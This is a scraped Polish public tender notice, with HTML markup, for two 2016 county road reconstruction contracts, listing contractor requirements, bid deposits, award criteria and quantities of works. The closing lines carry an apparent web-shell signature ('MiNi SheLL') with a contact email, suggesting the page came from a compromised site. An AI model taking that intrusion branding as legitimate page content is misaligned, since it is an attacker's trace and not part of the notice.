Na potwierdzenie niniejszego warunku należy złożyć wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty; 
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w tym okresie wykonał:
Dla zadania 1
dwie roboty budowlane każda związana z budową lub przebudową lub rozbudową dróg o nawierzchni z mieszanki mineralno-asfaltowej lub remontem dróg gdzie w ramach remontu dokonano wymiany nawierzchni z mieszanki mineralno-asfaltowej. Wymagana  wartości każdej z dwóch wykonanych robót budowlanych wynosiła minimum                  300 000,00 zł brutto.
Dla zadania 2 
dwie roboty budowlane każda związana z budową lub przebudową lub rozbudową dróg o nawierzchni z mieszanki mineralno-asfaltowej lub remontem dróg gdzie w ramach remontu dokonano wymiany nawierzchni z mieszanki mineralno-asfaltowej. Wymagana  wartości każdej z dwóch wykonanych robót budowlanych wynosiła minimum   600 000,00 zł brutto
Do każdej pozycji wykazu należy załączyć dowody określające, czy roboty te zostały wykonane w sposób należyty, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i  prawidłowo ukończone.
	
Tym samym doświadczeniem można wykazać się tylko do jednego zadania.

b)    wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia publicznego.
Na potwierdzenie niniejszego warunku należy złożyć wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje n/w osobami:

Dla zadania 1
Kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami w specjalności drogowej
oraz  
minimum 1 osobą zatrudnioną przez cały okres realizacji inwestycji w pełnym wymiarze czasu pracy na umowę o pracę, którzy bezpośrednio będą związani z wykonywanymi robotami drogowymi (pracownicy fizyczni oraz operatorzy używanego sprzętu).

Dla zadania 2
Kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami w specjalności drogowej
oraz  
minimum 1 osobą zatrudnioną przez cały okres realizacji inwestycji w pełnym wymiarze czasu pracy na umowę o pracę, którzy bezpośrednio będą związani z wykonywanymi robotami drogowymi (pracownicy fizyczni oraz operatorzy używanego sprzętu).

Do oferty w stosunku do kierownika budowy należy dołączyć oświadczenie Wykonawcy, że zaproponowana osoba posiada wymagane uprawnienia i przynależy do właściwej izby samorządu zawodowego jeżeli taki wymóg na te osoby nakłada Prawo budowlane.

Zgodnie z art. 12a Prawa budowlanego  który to odsyła do ustawy z dnia 18 marca 2008 r.  o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z dnia 17 kwietnia 2008 r. ze zm.) przynależność do  właściwej izby samorządu zawodowego nie jest wymagana od obywateli państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) gdyż do posiadania uprawnień w wykonywaniu samodzielnych funkcji w budownictwie nie jest wymagana przynależności do izby samorządu zawodowego.

Tym samy Kierownikiem budowy można wykazać się dla wszystkich zadań.  W odniesieniu dla pracowników fizycznych tymi samymi osobami można wykazać się tylko do jednego zadania.

	 sytuacji ekonomicznej lub finansowej.
	Na potwierdzenie należy złożyć: oświadczenie zgodnie z założeniami w pkt. 9.3 SIWZ  Zamawiający w tym zakresie nie stawia żadnych wymagań.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">W celu potwierdzenia braku podstaw do wykluczenia wykonawcy z postępowania, o których mowa w art. 24 ust. 1 pkt 23 ustawy, wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej której udostępniono SIWZ informacji o ofertach złożonych w postępowaniu zgodnie z art. 86 ust. 5 ustawy, składa stosownie do treści art. 24 ust. 11 ustawy, oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej oraz, w przypadku przynależności do tej samej grupy kapitałowej, dowody potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br /> Wadium w wysokości:
Zadanie 1: 9 000,00 PLN (słownie: dziewięć tysięcy złotych)
Zadanie 2: 18 000,00 PLN (słownie: osiemnaście tysiące złotych)
- należy wnieść przed upływem terminu składania ofert.</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena brutto</td><td>60</td></tr><tr><td>oferowany okres gwaracji i rękojmi</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zgodnie z zapisami określonymi w SIWZ<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 11/10/2016, godzina: 9:45,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Projekt dofinansowany w ramach podziału środków na usuwanie  Skutków Klęsk Żywiołowych.</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zadanie nr 1   Przebudowa drogi powiatowej nr 0504 T przez  wieś Sielec od km 3+128 do km 4+234<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przebudowa drogi powiatowej nr 0504 T przez  wieś Sielec od km 3+128 do km 4+234
Zakres realizowanej inwestycji obejmuje:


1) Roboty ziemne 
- Mechaniczna ścinka poboczy średniej gr. 10 cm, szerokość 1,0 m z wywozem urobku do  3 km. 1849,00 m2
2) Roboty rozborkowe
- Mechaniczne frezowanie nawierzchni średnia grubość 5 cm.  713,70 m2
- Ręczne rozebranie krawężników betonowych ułożonych na ławie betonowej. 271 mb
- Ręczne rozebranie chodnika z płyt  50x50x7cm. 165,00 m2
3) Elementy ulic
- Krawężniki betonowe wibroprasowane o wymiarach 15x30 cm z wykonaniem ław betonowych z oporem z betonu C12/ 15 na podsypce cementowo-piaskowej  206 mb

4) Zjazdy 
  Przełożenie nawierzchni z kostki betonowej brukowej na wjazdach z regulacją wysokościową na podsypce cementowo-piaskowej. 1,43 m2
5) Elementy odwodnienia:
- Ułożenie ścieku przy krawędzi jezdni z korytka półokrągłego 60x33x15cm  na ławie betonowej C12/15.65,00 mb,
- Studnia z kręgów o śr. 1000 mm z osadnikiem i z wpustem ściekowym, głęb. 2,0 m.  - 1 kpl.
- Wykonanie przyłączy z rur betonowych zbrojonych WIPRO z izolacją bitumiczną o średnicy 20 cm na ławie tłuczniowej gr. 20 cm, wraz z zagęszczeniem oraz wykonanie naziomu i podbudowy. Dług. 15,0 mb
- Odmulenie istniejących rowów z wyprofilowaniem dna i skarp , z namułu i gruntu śr.gł. od 30 do 50 cm wraz z uzupełnieniem i wyrównaniem poboczy oraz wywozem nadmiaru ziemi do 3 km.  - 300 mb
- Odmulenie przepustów pod zjazdami o średnicy  50 cm /zamulenie śr.60% światła/- 7 m
- Wykonanie przepustów pod zjazdami z rur żelbetowych o średnicy  50cm na ławie z kruszywa gr.15cm,    dług. 5,0 m
6)  Nawierzchnia
 Wykonanie warstwy wyrównawczej z betonu asfaltowego w ilości 100 kg/m2, ruch KR 2; 630,41 t
- Wykonanie warstwy ścieralnej z betonu asfaltowego grubość warstwy po zagęszczeniu 4cm, ruch KR
- 6 304,10 m2.
- Wykonanie warstwy ścieralnej z betonu asfaltowego grubość warstwy po zagęszczeniu 5cm, ruch KR 2, na wjazdach  88 m2
- Pobocze utwardzone z betonu asfaltowego,warstwa ścieralna śr. grub. 5cm po zagęszczeniu, szerokość 1,0m; 44,0  m2
7)  Roboty wykończeniowe
 Utwardzenie zjazdów w granicach pasa drogowego materiałem kamiennym 0-31,5 mm, gr. 10 cm, 99,00 m2
- Umocnienie poboczy materiałem kamiennym   0-31,5mm gr.10cm szer. 0,75m.  - 1386,75 m2<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233000-9, 45111000-8,
                    45112000-5,
                    45233000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 10/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena brutto</td><td>60</td></tr><tr><td>ofrowany okres gwarancji i rękojmi</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zadanie nr 2 - Przebudowa drogi powiatowej nr 0518 T Topola  Słonowice  od km 4+126 do km 5+676<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przebudowa drogi powiatowej nr 0518 T Topola  Słonowice  od km 4+126 do km 5+676
Zakres realizowanej inwestycji obejmuje:
1) Roboty ziemne i przygotowawcze
  Mechaniczna ścinka poboczy średniej gr. 10 cm, szerokość 0,5 m oraz 0,75m  z wywozem urobku do  3 km.  1970,50 m2
- Regulacja pionowa studzienek kanalizacyjnych z nadbudową wykonaną betonem. 14 szt.
2) Zjazdy do posesji
  Przełożenie nawierzchni z kostki betonowej brukowej na wjazdach z regulacją wysokościową na podsypce cementowo-piaskowej.40 m2.
- Wykonanie koryta głębokości 30 cm w gruncie kategorii II-IV przy użyciu koparki podsiębiernej o pojemności łyżki 0,25 m3 z transportem urobku samochodami samowyładowczymi na odległość do 5 km- 168,00 m2
- Wykonanie i zagęszczenie warstwy piasku w korycie grubości 10 cm.   - 168,00 m2
- Podbudowa z kruszywa łamanego 0-31,5 mm - grubość warstwy po zagęszczeniu 20 cm.- 168,00 m2
- Utwardzenie zjazdów w granicach pasa drogowego materiałem kamiennym 0-31,5 mm, gr. 10 cm. - 260 m2
3) Elementy odowodnienia:
- Ułożenie ścieku przy krawędzi jezdni z korytka półokrągłego 60x33x15cm  na ławie betonowej C12/15. - 228 mb
- Ułożenie ścieku korytkowego KS-74 prefabrykowanego zbrojonego na ławie betonowej C12/15.- 620 mb
- Przedłużenie przepustu pod drogą z rur o średnicy 60cm - 1,0 mb oraz wykonanie ścianki czołowej na mokro - 1 szt. dla przepustu z rur o śr. 60cm + oczyszczenie przepustu z rur fi 60 na długości 7m (zamulenie 40%) 
- Odmulenie istniejących rowów z wyprofilowaniem dna i skarp , z namułu i gruntu śr.gł. 50 cm wraz z uzupełnieniem i wyrównaniem poboczy oraz wywozem nadmiaru ziemi do 3 km.  - 1727 mb
- Wykonanie przepustów pod zjazdami z rur żelbetowych o średnicy  50cm na ławie z kruszywa gr.15cm. - 44,00 m
4) Wzmocnienie podłoża pod pobocza utwardzone w km 5+036 do km 5+676 
  Koryta gł. 45 cm wykonywane w gruntach kat. II-IV na poszerzeniach jezdni przy użyciu koparki podsiębiernej o pojemności łyżki 0,25m3 ziemia na uzupełnienie poboczy nadmiar ziemi z odwozem samochodami na odległość do 1 km  640,00 m2
-Wykonanie i zagęszczane mechanicznie warstwy piasku w korycie na poszerzeniu o gr.15 cm. -320 m2
- Podbudowa z kruszywa łamanego 31,5-63 mm warstwa dolna o grubości 20 cm po zagęszczeniu  320 m2
- Podbudowa z kruszywa łamanego 0-31,5 mm warstwa górna o grubości 10 cm po zagęszczeniu. - 320 m2
5) Nawierzchnia:
- Wykonanie warstwy wyrównawczej z betonu asfaltowego w ilości 100 kg/m2, ruch KR 2; 789,50t
- Wykonanie warstwy ścieralnej z betonu asfaltowego grubość warstwy po zagęszczeniu 4cm, ruch KR 2;- 7895,00 m2
- Wykonanie warstwy ścieralnej z betonu asfaltowego grubość warstwy po zagęszczeniu 5cm, ruch KR 2  183,00 m2
- Geosiatka na połączeniu istniejącej nawierzchni i dobudowanej ,szerokości 1 m - geosiatki, o wytrzymałości na rozciąganie &gt; lub równy 20 kN/m i wydłużeniu przy zerwaniu wzdłuż pasma &lt; lub równy10%.- 2 812 m2
6) Roboty wykończeniowe  pobocza:
- Umocnienie poboczy materiałem kamiennym   0-31,5mm gr.10cm szer. 0,5m i szer. 0,75m.  - 1970,50 m2
- Powierzchniowe utrwalanie nawierzchni drogowych (na poboczach)emulsją asfaltową przy użyciu grysu kamiennego frakcji 5-8. Ilość kruszywa 8,0 dm3/m2.   - 1970,50 m2<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233000-9, 45111000-8,
                    45112000-5,
                    45233000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 10/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena brutto</td><td>60</td></tr><tr><td>oferowany okres gwarancji i rękojmi</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com